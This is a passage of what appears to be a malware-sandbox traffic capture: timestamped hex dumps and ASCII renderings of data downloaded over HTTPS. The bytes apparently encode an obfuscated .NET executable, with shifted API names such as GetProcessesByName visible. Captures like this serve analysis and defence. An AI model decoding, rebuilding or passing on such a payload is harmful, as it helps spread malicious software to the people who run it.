                                                                              2022-06-01 23:53:56 UTC1656INData Raw: cb 6a 3b cb b5 42 e9 27 ec 41 ca 0b 99 70 be 06 d1 78 f9 85 ef a1 43 21 6a 58 ae 04 fb e7 35 7f 79 4a ed 0a 80 33 39 a8 14 d6 43 1a 68 8e 48 53 5c a2 da 77 f6 93 11 a8 20 eb 57 d7 68 74 cf c3 40 1e 62 48 03 47 94 a9 0e 9d 2f 9a 01 fe b9 ff f4 de 20 2b 9b c4 c1 d2 42 a5 28 fa 87 2a ff 8d 01 39 da 11 33 49 2e d9 4b a0 4f f7 e5 2a 0b c8 9c b0 db 4b 6a 68 43 82 d4 a2 8f 20 08 23 11 d0 ad bc 73 a9 7c 1f be b8 5f 76 66 bd 14 00 90 18 40 69 a8 76 2d cc b2 2f b1 43 81 cc bb c4 5e a6 b4 30 df 6b 71 8b bf 08 be c7 61 f0 f6 3e 62 ce d1 b0 c3 9e 05 7b 58 e9 3d af 88 57 08 b6 9c 8f fb 95 20 db 9f 00 da df 6f 82 90 cf 05 4d 75 cf a2 32 e1 26 d8 ae f0 30 85 0b 79 07 87 4f 79 03 63 a0 63 d7 57 5f db 42 6e 5f 76 ae 28 c4 5b 5f 08 e4 fd 2b d5 1b d4 43 f8 40 fe ba ef 73 55
                                                                              Data Ascii: j;B'ApxC!jX5yJ39ChHS\w Wht@bHG/ +B(*93I.KO*KjhC #s|_vf@iv-/C^0kqa>b{X=W oMu2&0yOyccW_Bn_v([_+C@sU
                                                                              2022-06-01 23:53:56 UTC1657INData Raw: b6 d9 c0 0f f1 c0 a7 3a de f3 07 d4 08 61 7b 06 72 2f 2f 61 67 c5 35 9b ba 72 af a2 69 95 50 ed 9f 28 c9 7c 59 66 ff 46 09 7b 89 6e 88 a7 95 1f 32 16 21 9c 1d 15 f3 91 a0 04 cd 4f 19 ae d6 eb fb 9d 3b ec 58 76 0f 67 5e e9 b9 dd fe fb 40 88 8d 0d bc 0d 05 79 db 02 3c 71 80 ac da 06 a1 25 c3 14 08 70 ee ec 1b 2a 50 a7 ac 2c 84 19 fe 63 b3 9a f5 2c 38 25 0d 4a 86 0c 22 4b 87 93 c6 54 50 33 db b7 17 35 0c 02 32 c5 aa 6c eb d8 a7 4e 03 6d 45 d0 4a 17 71 4f 1d eb 71 44 94 e7 91 c8 cd f0 7b a3 ea db 05 9a e5 58 27 bd 27 2d 76 65 61 ce ac ca d9 07 5b ba e5 21 ab d1 3a 00 c1 60 73 1d 90 04 ca cc 83 cd d1 01 6a 08 dd 4f a7 70 ce b4 a9 fe 1c 86 73 79 4d 71 ad ee f6 e7 11 95 2c 74 89 14 c5 90 0d bf 38 d2 b2 e5 d7 2f 64 9b 93 d1 67 54 fe 5a ae 82 46 8e 89 57 3c c5 a8
                                                                              Data Ascii: :a{r//ag5riP(|YfF{n2!O;Xvg^@y<q%p*P,c,8%J"KTP352lNmEJqOqD{X''-vea[!:`sjOpsyMq,t8/dgTZFW<
                                                                              2022-06-01 23:53:56 UTC1659INData Raw: 0f 38 83 97 ad 7b 18 be 18 27 5b 18 6c 61 65 5d 67 6d 6c 18 2d 18 1e 1e 18 65 67 6e 5d 6e 6b 6b 5d 6a 6e 59 2a 5f 6d 59 6a 5c a4 b6 ac 59 a6 c4 9c ca c0 c6 37 20 82 8d 3f 51 fa fe c6 b9 5b be 59 0f fb 34 ed 81 4e 87 84 a2 17 fb e0 5e 99 32 0f fb 50 ff 6c d5 70 15 1e b5 05 7b 34 98 02 6f bb 19 43 10 15 c8 df af e3 0c 38 42 78 b2 04 25 76 90 53 f9 c2 09 c4 a8 56 75 20 25 43 34 d6 4b ea 38 8f 90 6b db 81 95 fb ad 01 74 30 96 93 62 a8 d6 fc 9a 3c 01 a4 aa 4b 92 b1 97 9f b2 63 a7 2d e4 4e 38 1a 6b b0 92 07 b4 f5 0c ff 47 6f b6 d8 b5 73 64 2f 33 06 e1 8b dc 3c d0 21 e0 ed 3f 41 51 3e 42 3f 53 40 35 1d 61 8b 7f 03 8f a3 fb 1b f1 b5 e1 37 f6 6f f1 d6 64 a4 35 27 d7 68 1d be ad c1 a5 01 24 6f 7d 6d 35 3e c5 9f 7e d5 f2 31 38 ad 27 23 03 00 42 d8 44 63 d2 a5 02 06
                                                                              Data Ascii: 8{'[lae]gml-egn]nkk]jnY*_mYj\Y7 ?Q[Y4N^2Plp{4oC8Bx%vSVu %C4K8kt0b<Kc-N8kGosd/3<!?AQ>B?S@5a7od5'h$o}m5>~18'#BDc
                                                                              2022-06-01 23:53:56 UTC1660INData Raw: fc f8 f8 f8 fd f8 f8 f8 fa f8 f8 f8 00 f8 f8 f8 fc f8 f8 f8 0a f8 f8 f8 f9 f8 f8 f8 ff f8 f8 f8 f9 f8 f8 f8 0e f8 f8 f8 f9 f8 f8 f8 02 f8 f8 f8 f8 f8 f9 f8 f9 f8 f8 f8 f8 f8 fe f8 15 f8 1c f8 fe f8 31 f8 1c f8 02 f8 7b f8 66 f8 fe f8 c4 fa 1c f8 fe f8 01 fb 1c f8 fe f8 68 fc 71 fc 06 f8 17 fe 25 fe fe f8 38 fe 48 fe fe f8 59 fe 65 fe fe f8 7a fe 1c f8 fe f8 87 fe 94 fe fe f8 af fe be fe fe f8 ee fe 1c f8 fe f8 f4 fe 1c f8 fe f8 07 ff 1c f8 06 f8 1c ff 25 fe fe f8 3b ff 1c f8 fe f8 50 ff 57 ff fe f8 72 ff 1c f8 fe f8 81 ff 8a ff fe f8 a7 ff 1c f8 fe f8 b9 ff 8a ff fe f8 c7 ff 8a ff fe f8 e2 ff e7 ff fe f8 f8 00 e7 ff fe f8 1d 00 1c f8 06 f8 36 00 25 fe 06 f8 78 00 25 fe fe f8 9b 00 a3 00 fe f8 d9 00 1c f8 fe f8 09 01 1c f8 fe f8 a0 01 e7 ff 0a f8 58 fb c0
                                                                              Data Ascii: 1{fhq%8HYez%;PWr6%x%X
                                                                              2022-06-01 23:53:56 UTC1661INData Raw: fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 fd fb f8 f8 09 f8 3a f8 8b f8 0b f9 f8 f8 ff fb f8 f8 09 f8 3a f8 8b f8 f8 f9 f8 f8 2b f8 25 f8 fd f8 3a f8 8b f8 08 f9 f8 f8 e1 f8 e1 f8 09 f8 3c f8 8b f8 f8 f9 f8 f8 29 f8 29 f8 fd f8 3c f8 8b f8 08 f9 f8 f8 e1 f8 23 f8 09 f8 3e f8 8b f8 f8 f9 08 f8 23 f8 29 f8 0d f8 3e f8 8b f8 f8 f8 08 f8 29 f8 af f8 0d f8 3e f8 8c f8 f8 f8 08 f8 29 f8 e5 fa 0d f8 3e f8 8d f8 f8 f8 08 f8 2b f8 23 f8 0d f8 3e f8 8e f8 f8 f8 08 f8 e5 fa 23 f8 0d f8 3e f8 8f f8 f8 f8 08 f8 e1 f8 29 f8 0d f8 3e f8 90 f8 f9 f9 f8 f8 0b fb 15 fb 01 f8 3e f8 91 f8 79 f9 f8 f8 2d fb 3d fb fd f8 3e f8 95 f8 79 f9 08 f8 58 fb 3d fb fd f8 40 f8 97 f8 f8 f9 f8 f8 23 f8 23 f8 fd f8 40 f8 98 f8 0b f9 f8 f8 23 f8 f8 f8 09 f8 41 f8 98 f8 f8 f8 f8 f8 2b f8 2b f8
                                                                              Data Ascii: :::+%:<))<#>#)>)>)>+#>#>)>>y-=>yX=@##@#A++
                                                                              2022-06-01 23:53:56 UTC1663INData Raw: f8 f8 3d fc f8 f8 01 f8 d6 f8 82 f9 f8 f9 f8 f8 40 fc f8 f8 01 f8 d7 f8 85 f9 f8 f9 f8 f8 43 fc f8 f8 01 f8 d8 f8 88 f9 f8 f9 f8 f8 46 fc f8 f8 01 f8 d9 f8 8b f9 f8 f9 f8 f8 49 fc f8 f8 01 f8 da f8 8e f9 f8 f9 f8 f8 4c fc f8 f8 01 f8 dc f8 91 f9 f8 f9 f8 f8 4f fc f8 f8 01 f8 de f8 94 f9 f8 f9 f8 f8 52 fc f8 f8 01 f8 e0 f8 97 f9 f8 f9 f8 f8 55 fc f8 f8 01 f8 e2 f8 9a f9 f8 f9 f8 f8 58 fc f8 f8 01 f8 e4 f8 9d f9 f8 f9 f8 f8 5c fc f8 f8 01 f8 e5 f8 a0 f9 f8 f9 f8 f8 60 fc f8 f8 01 f8 e7 f8 a3 f9 f8 f9 f8 f8 64 fc f8 f8 01 f8 e8 f8 a6 f9 0e f8 23 f8 02 f8 0e f8 23 f8 06 f8 0e f8 7d fc 06 f8 0e f8 7d fc 09 f8 0e f8 81 fc 06 f8 0e f8 8c fc 06 f8 0e f8 99 fc 06 f8 0e f8 a6 fc 0c f8 0e f8 b1 fc 10 f8 0e f8 bc fc 10 f8 0e f8 c9 fc 10 f8 0e f8 d5 fc 13 f8 0e f8 e2
                                                                              Data Ascii: =@CFILORUX\`d##}}
                                                                              2022-06-01 23:53:56 UTC1664INData Raw: bd 03 9b fa 0b f8 10 fc a6 fa 0b f8 13 fc a6 fa 0b f8 16 fc b2 fa 0b f8 19 fc bb fa 0b f8 e4 03 bb fa 0b f8 1c fc bb fa 0b f8 e8 03 bb fa 0b f8 1f fc c5 fa 0b f8 22 fc c5 fa 0b f8 25 fc d0 fa 0b f8 07 04 d0 fa 0b f8 28 fc da fa 0b f8 2b fc e4 fa 0b f8 1e 04 e4 fa 0b f8 2e fc ee fa 0b f8 2f 04 ee fa 0b f8 31 fc ee fa 0b f8 45 04 ee fa 0b f8 34 fc ee fa 0b f8 56 04 ee fa 0b f8 37 fc fa fb 0b f8 98 04 fa fb 0b f8 3a fc 06 fb 0b f8 bc 04 06 fb 0b f8 3d fc 11 fb 0b f8 40 fc 1c fb 0b f8 43 fc 26 fb 0b f8 46 fc 26 fb 0b f8 49 fc 26 fb 0b f8 4c fc 30 fb 0b f8 00 05 30 fb 0b f8 4f fc 3a fb 0b f8 52 fc 43 fb 0b f8 55 fc 43 fb 0b f8 58 fc 43 fb 0b f8 5c fc 4e fb 0b f8 61 05 4e fb 0b f8 60 fc 59 fb 0b f8 66 05 59 fb 0b f8 64 fc 65 fb 0b f8 80 05 71 fb 0b f8 84 05 7c
                                                                              Data Ascii: "%(+./1E4V7:=@C&F&I&L00O:RCUCXC\NaN`YfYdeq|
                                                                              2022-06-01 23:53:56 UTC1665INData Raw: f8 38 3c f8 f8 f8 f8 8e f8 54 09 5e fb 22 f8 5c 3c f8 f8 f8 f8 8e f8 78 09 6a fb 24 f8 80 3c f8 f8 f8 f8 8e f8 9d 09 76 fb 26 f8 a0 3c f8 f8 f8 f8 8e f8 0f fe 4a fd 27 f8 20 3d f8 f8 f8 f8 8e f8 b7 09 52 fd 27 f8 90 3d f8 f8 f8 f8 8e f8 12 fd a2 fc 29 f8 dc 3d f8 f8 f8 f8 89 f8 23 f8 59 fd 29 f8 78 42 f8 f8 f8 f8 8e f8 0b fe a2 fc 29 f8 c0 42 f8 f8 f8 f8 8e f8 4a f8 a2 fc 29 f8 0c 43 f8 f8 f8 f8 8e f8 13 fe a2 fc 29 f8 f8 f8 f8 f8 78 f8 8e 58 da 09 62 fd 29 f8 58 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 2b f8 60 43 f8 f8 f8 f8 89 10 02 07 a2 fc 2b f8 f8 f8 f8 f8 fb f8 7e 10 0c 07 e4 fc 2b f8 f8 f8 f8 f8 fb f8 be f9 d2 ff 69 fd 2d f8 f8 f8 f8 f8 fb f8 be f9 51 07 70 fd 2f f8 f8 f8 f8 f8 fb f8 be f9 81 07 7d fd 33 f8 e8 43 f8 f8 f8 f8 7e 10 0c 07 97 fa 34 f8 f0 43
                                                                              Data Ascii: 8<T^"\<xj$<v&<J' =R'=)=#Y)xB)BJ)C)xXb)XC~+`C+~+i-Qp/}3C~4C
                                                                              2022-06-01 23:53:56 UTC1666INData Raw: 97 fa af f8 68 56 f8 f8 f8 f8 7e 10 0c 07 97 fa af f8 70 56 f8 f8 f8 f8 fe 10 0c 07 42 f9 af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff dc fe af f8 78 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e4 fe af f8 88 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff e9 fe af f8 98 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ef fe af f8 a8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff f4 fe af f8 b8 56 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af
                                                                              Data Ascii: hV~pVB>xV>V>V>V>V
                                                                              2022-06-01 23:53:56 UTC1668INData Raw: 8e ff af f8 68 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 96 ff af f8 78 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 9d ff af f8 88 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff a4 ff af f8 98 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff ab ff af f8 a8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 70 ff af f8 b8 58 f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff b2 ff af
                                                                              Data Ascii: hX>xX>X>X>X>pX>
                                                                              2022-06-01 23:53:56 UTC1669INData Raw: 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 4f 00 af f8 80 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 55 00 af f8 94 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 5a 00 af f8 a8 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 60 00 af f8 bc 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff 66 00 af f8 d0 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07 e4 fc af f8 f8 f8 f8 f8 fb f8 3e f8 d2 ff c3 f8 af f8 e4 5a f8 f8 f8 f8 08 10 02 07 a2 fc af f8 f8 f8 f8 f8 fb f8 fe 10 0c 07
                                                                              Data Ascii: >OZ>UZ>ZZ>`Z>fZ>Z
                                                                              2022-06-01 23:53:56 UTC1670INData Raw: f9 f8 20 0a f8 f8 fa f8 27 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 43 0a f8 f8 fc f8 4a 0a f8 f8 fd f8 55 0a f8 f8 fe f8 78 07 f8 f8 ff f8 3f 07 f8 f8 f9 f8 43 0a f8 f8 fa f8 55 0a f8 f8 fb f8 8b 07 f8 18 fa f8 e1 f8 f8 18 f9 f8 29 f8 f8 f8 f9 f8 29 f8 08 08 fa f8 e1 f8 f8 f8 f9 f8 29 f8 f8 f8 fa f8 e1 f8 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 f9 f8 2f 0a f8 f8 fa f8 37 0a f8 f8 fb f8 78 07 f8 f8 fc f8 3f 07 f8 f8 f9 f8 8b 07 f8 f8 f9 f8 3f 07 f8 f8 fa f8 46 07 f8 f8 f9 f8 84 0a f8 f8 f9 f8 84 0a f8 f8 fa f8 78 07 f8 f8 fb f8 3f
                                                                              Data Ascii: 'x??F/7CJU/7CJUx?CU)))?F/7/7x??Fx?
                                                                              2022-06-01 23:53:56 UTC1672INData Raw: c0 fa 71 f8 f8 04 c0 fa 71 f8 ff 04 ca fa b9 f8 0b 04 d5 fa 11 f8 12 04 df fa 11 f8 22 04 e9 fa 11 f8 33 04 e9 fa 61 f9 49 04 e9 fa 79 f9 6b 04 f3 fa 79 f9 9c 04 ff fb 91 f9 c5 04 0b fb 99 f9 df 04 16 fb 91 f9 e3 04 21 fb 91 f9 e7 04 21 fb 91 f9 ef 04 21 fb 71 f8 f4 04 2b fb c9 f8 04 05 35 fb 99 f9 0b 05 3f fb a1 f9 2e 05 3f fb 99 f9 42 05 3f fb a9 f9 5c 05 48 fb 29 f8 0b fb 53 fb b1 f9 da 01 5e fb b1 f9 78 05 6a fb b1 f9 12 01 76 fb c9 f8 da 01 81 fb 79 f8 8c 05 8b fb 71 f8 9f 05 96 fb e1 f8 aa 05 a1 fb b9 f9 bc 05 ac fb 61 f8 c2 00 b5 fb 19 f9 cd 05 c5 fb 19 f9 e1 05 d2 fb c1 f9 06 06 de fb a1 f8 12 06 f4 fb c9 f8 da 01 07 fc c9 f8 da 01 11 fc c9 f8 04 05 1b fc e1 f8 48 06 25 fc 31 f9 59 06 2f fc b9 f9 cd 03 3b fc b9 f9 c1 03 3b fc 71 f8 73 06 46 fc a1
                                                                              Data Ascii: qq"3aIyky!!!q+5?.?B?\H)S^xjvyqaH%1Y/;;qsF
                                                                              2022-06-01 23:53:56 UTC1673INData Raw: f8 f8 f9 ff f9 4c 0b fa f8 74 5c f8 f8 2b f8 d0 5c f8 f8 2c f8 d8 5c f8 f8 2d f8 e1 5c f8 f8 2e f8 e6 5c f8 f8 2f f8 fe 5d f8 f8 30 f8 07 5d f8 f8 31 f8 0e 5d f8 f8 32 f8 39 5d f8 f8 33 f8 3f 7d f8 f8 34 f8 4f 7d f8 f8 35 f8 56 7e f8 f8 36 f8 6b 7e f8 f8 37 f8 71 7e f8 f8 38 f8 78 7e f8 f8 39 f8 a5 7e f8 f8 3a f8 8f 80 f8 f8 3c f8 6b 82 f8 f8 40 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 0c f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 66 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f9 f8 1c f8 f8 f8 f8 f8 02 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 c0 01 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 b7 02 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 de f9 83 04
                                                                              Data Ascii: Lt\+\,\-\.\/]0]1]29]3?}4O}5V~6k~7q~8x~9~:<k@f
                                                                              2022-06-01 23:53:56 UTC1674INData Raw: 17 f8 77 f8 ba 78 f8 ba 79 f8 ba 7a f8 ba 7b f8 ba 7c f8 ba 7e f8 ba 7f f8 ba 80 f8 ba 81 f8 ba 82 f8 ba 83 f8 ba 84 f8 ba 85 f8 ba 86 f8 ba 87 f8 ba 88 f8 ba 89 f8 ba 8a f8 ba 8b f8 ba 8c f8 ba 8d f8 ba 8e f8 ba 8f f8 ba 90 f8 ba 91 f8 ba 92 f8 ba 93 f8 ba 94 f8 ba 95 f8 ba 96 f8 ba 97 f8 f9 fa f8 fa fa f8 fb fa f8 fc fa f8 fd fa f8 fe fa f8 ff fa f8 00 fa f8 06 fa f8 07 fa f8 08 fa f8 09 fa f8 0a fa f8 0b fa f8 0c fa f8 0d fa f8 0e fa f8 0f fa f8 10 fa f8 11 fa f8 12 fa f8 13 fa f8 14 fa f8 15 fa f8 16 fa f8 17 fa f8 77 fa f8 ba 78 fa f8 ba 79 fa f8 ba 7a fa f8 ba 7b fa f8 3d 66 5b 67 5c 61 66 5f f8 4b 71 6b 6c 5d 65 26 4c 5d 70 6c f8 d9 7a 9b f8 61 c7 8a c1 9a c6 89 e7 b7 b5 f8 e1 80 97 ca 87 d2 b7 e1 80 7f ba a3 f8 bd 86 cd b3 d3 92 e7 b7 b5 e7 b7 b5
                                                                              Data Ascii: wxyz{|~wxyz{=f[g\af_Kqkl]e&L]plza
                                                                              2022-06-01 23:53:56 UTC1676INData Raw: 67 66 48 67 61 66 6c 5d 6a f8 3c 5d 64 5d 5f 59 6c 5d f8 3f 5d 6c 3a 71 6c 5d 6b f8 76 17 f8 5f 5d 6c 57 4d 66 61 5b 67 5c 5d f8 5f 5d 6c 57 39 4b 3b 41 41 f8 5f 5d 6c 57 3c 5d 5e 59 6d 64 6c f8 5f 5d 6c 57 4d 4c 3e 30 f8 3f 5d 6c 3b 6d 6a 6a 5d 66 6c 48 6a 67 5b 5d 6b 6b f8 5f 5d 6c 57 45 59 61 66 45 67 5c 6d 64 5d f8 76 ba 7c f8 5f 5d 6c 57 3e 61 64 5d 46 59 65 5d f8 76 ba 7e f8 4c 67 4b 6c 6a 61 66 5f f8 76 ba 7f f8 5f 5d 6c 57 48 6a 67 5b 5d 6b 6b 46 59 65 5d f8 76 ba 80 f8 48 59 6c 60 f8 3b 67 65 5a 61 66 5d f8 3f 5d 6c 48 6a 67 5b 5d 6b 6b 5d 6b 3a 71 46 59 65 5d f8 45 61 5b 6a 67 6b 67 5e 6c 26 4e 61 6b 6d 59 64 3a 59 6b 61 5b f8 44 5d 66 f8 4c 67 41 66 6c 2b 2a f8 3f 5d 6c 3b 60 59 6a f8 3b 60 6a 4f f8 3d 66 6e 61 6a 67 66 65 5d 66 6c f8 3f 5d 6c
                                                                              Data Ascii: gfHgafl]j<]d]_Yl]?]l:ql]kv_]lWMfa[g\]_]lW9K;AA_]lW<]^Ymdl_]lWML>0?]l;mjj]flHjg[]kk_]lWEYafEg\md]v|_]lW>ad]FYe]v~LgKljaf_v_]lWHjg[]kkFYe]vHYl`;geZaf]?]lHjg[]kk]k:qFYe]Ea[jgkg^l&NakmYd:Yka[D]fLgAfl+*?]l;`Yj;`jO=fnajgfe]fl?]l
                                                                              2022-06-01 23:53:56 UTC1677INData Raw: f8 3b 67 65 68 59 6a 5d 4b 6c 6a 61 66 5f f8 ba 8d fa f8 ba 8e fa f8 ba 8f fa f8 4b 68 64 61 6c f8 ba 90 fa f8 76 ba 90 fa f8 5f 5d 6c 57 39 6b 6b 5d 65 5a 64 71 f8 ba 91 fa f8 76 ba 91 fa f8 3f 5d 6c 47 5a 62 5d 5b 6c f8 ba 92 fa f8 76 ba 92 fa f8 ba 93 fa f8 76 ba 93 fa f8 3f 5d 6c 3d 70 5d 5b 6d 6c 61 66 5f 39 6b 6b 5d 65 5a 64 71 f8 ba 94 fa f8 3f 5d 6c 45 59 66 61 5e 5d 6b 6c 4a 5d 6b 67 6d 6a 5b 5d 4b 6c 6a 5d 59 65 f8 ba 95 fa f8 76 ba 95 fa f8 ba 96 fa f8 4a 5d 59 5c f8 ba 97 fa f8 76 ba 97 fa f8 26 5b 5b 6c 67 6a f8 3a 3a f8 26 5b 6c 67 6a f8 e7 b7 b5 e7 b7 b5 c7 a9 e1 80 7f e7 b7 b5 f8 e7 b7 b5 e7 b7 b5 c6 7d e3 82 b3 c4 a6 f8 e7 b7 b5 d7 7a bb 9d bd ac ca 9a f8 d9 7a a0 f8 67 5a 62 5d 5b 6c f8 65 5d 6c 60 67 5c f8 59 f8 5a f8 3a 5d 5f 61 66 41
                                                                              Data Ascii: ;gehYj]Kljaf_Khdalv_]lW9kk]eZdqv?]lGZb][lvv?]l=p][mlaf_9kk]eZdq?]lEYfa^]klJ]kgmj[]Klj]YevJ]Y\v&[[lgj::&[lgj}zzgZb][le]l`g\YZ:]_afA
                                                                              Data Ascii: ^;hW5Hk)&h%a[~<1Fr9ZB_@;;PYVEXqn/ju vqL\Mpr/OgI<p.A~,*0{40,l._k/!Dbr@Zk3KQo$bu)]Pu-4[fT3x7kAknA9T
                                                                              2022-06-01 23:53:56 UTC1797INData Raw: c4 dc bf 43 49 6f ca 98 f9 4d c5 03 cc 21 4b c5 b0 6b b2 8d 57 15 51 27 39 97 b8 ca f9 07 fd 92 23 b0 78 81 ac 03 14 f8 54 79 5e 7f 40 62 6e b5 eb fa 6f 62 d7 3a d5 13 f0 25 01 ca 4c 21 17 dc d1 9b 6d 2e eb e5 c2 b8 2e c4 0d 4f d1 2a 31 49 a9 a2 4c 80 1d d2 a6 f4 80 cc dd 43 8c 20 2d a8 47 c0 df b5 53 43 2c 79 e2 c4 84 55 ad a1 03 b4 4a 8b 0d ea dc 9b 27 f6 ba 09 45 b3 ea 9f b6 1a ff 21 38 02 2e dd b7 fb 03 6d 7f fa b1 db 6a e8 4e 05 fa 79 9d 4a 42 6c 9f df e4 f1 48 b7 4c 0b a5 ed 12 5c 9f a7 ee 2f 38 49 46 a6 c4 aa ee 98 42 ea c1 f1 51 ba 95 f4 ac 40 f5 e4 7e 82 1b 0c 28 e7 6d 77 7d cc c8 84 a4 42 fc f0 84 c2 be c9 b5 7f 84 44 07 60 b9 ae b1 a5 f0 27 2f de 42 c6 bb 2f 0f e2 32 ec 76 9d 39 24 0b 14 bd eb 09 23 51 2b 20 5e 1b 32 88 4d 0d 1f af 2c 1d 24 ba
                                                                              Data Ascii: CIoM!KkWQ'9#xTy^@bnob:%L!m..O*1ILC -GSC,yUJ'E!8.mjNyJBlHL\/8IFBQ@~(mw}BD`'/B/2v9$#Q+ ^2M,$
                                                                              2022-06-01 23:53:56 UTC1801INData Raw: 41 7d 00 36 5a 3c 10 2b 49 60 ca 3f c5 0b 32 5d 5b b2 35 38 af 77 03 ff c7 ce d6 67 c5 21 cb e4 ad 54 b4 ee 3a 04 5d 2e 0a 43 b3 85 97 b8 44 ad 9a 9e 28 6b 24 ac e1 97 88 98 c2 a4 8d 7a e8 aa b8 8d 38 3f ba ff 10 4a a5 d7 e7 5a a8 2a e0 89 76 2d 43 1d 49 09 00 a2 18 4d 89 e6 56 b2 4c 63 e4 a1 3f 44 12 39 85 29 a6 55 98 70 d1 ec 34 2c df dd 2b a9 f2 cd 36 6e f3 7c 2f 30 38 0b 2c 36 55 54 3a 58 6b 62 95 d0 de ea c2 73 0d 69 89 6e da f6 af 0f e4 04 ba ef 3e 43 c5 ab 6d 0a a7 34 be 48 8f 7f c5 dd fc 04 19 56 c7 20 6b 0c d9 8a 78 6d f1 f1 6b cf 6f e6 43 b2 7e 75 c7 60 9f 09 6c e5 b7 05 8d 94 96 fe 19 80 cb 77 75 d7 aa 96 d7 6e c9 f9 9c 00 24 79 68 ce 93 1e 49 cd cb 08 a1 59 a8 9e 97 e0 e8 57 69 79 ed 25 ed 3c 16 6e cd b5 56 51 15 c6 dd 9a d6 52 b5 c5 1c a4 6d
                                                                              Data Ascii: A}6Z<+I`?2][58wg!T:].CD(k$z8?JZ*v-CIMVLc?D9)Up4,+6n|/08,6UT:Xkbsin>Cm4HV kxmkoC~u`lwun$yhIYWiy%<nVQRm
                                                                              2022-06-01 23:53:56 UTC1805INData Raw: db 87 4c d8 a5 2f 92 e3 1b 9f d0 2d 9d c8 a3 ef f3 65 83 f8 39 4c c8 10 11 ec a3 35 5d 9a 8f 58 4b e6 b8 f7 85 74 c3 de 31 08 a6 98 47 78 c6 a7 4b 1c 0c db a7 0b a6 b6 b6 57 69 cf a7 11 f9 5e bf bd 2c 3e d3 e7 e3 9a 89 a4 12 d8 b2 50 d8 e0 58 16 87 ce 00 49 2d bd c6 3a fa 4c dd e4 08 70 1c fc 37 6b 0f f0 d9 5b 77 8f 14 78 dd e1 bd 76 29 d0 e8 5c 4b 63 a4 51 37 3d 44 a2 59 95 87 2e ea a9 71 8b 65 3a c9 5f 9a 94 1a 0e 37 fa 83 30 1b 89 1e 0f 87 db bb c3 e4 8c 4f 21 aa 69 5c 63 ad ee a4 09 3a 50 91 15 3f d2 79 db 17 97 56 53 76 60 2d 18 d6 31 6a 92 d8 5e 6a d6 fc 49 4d 15 7a 35 dc 1f 0d ac e1 c2 2c 30 89 8f 72 9e 7b d3 ea a4 93 4b f3 98 42 02 02 1d 88 a6 c5 9e 6f e9 bf 39 9a e8 ab c2 47 d0 3b 5f 31 1e 86 ab d9 1b 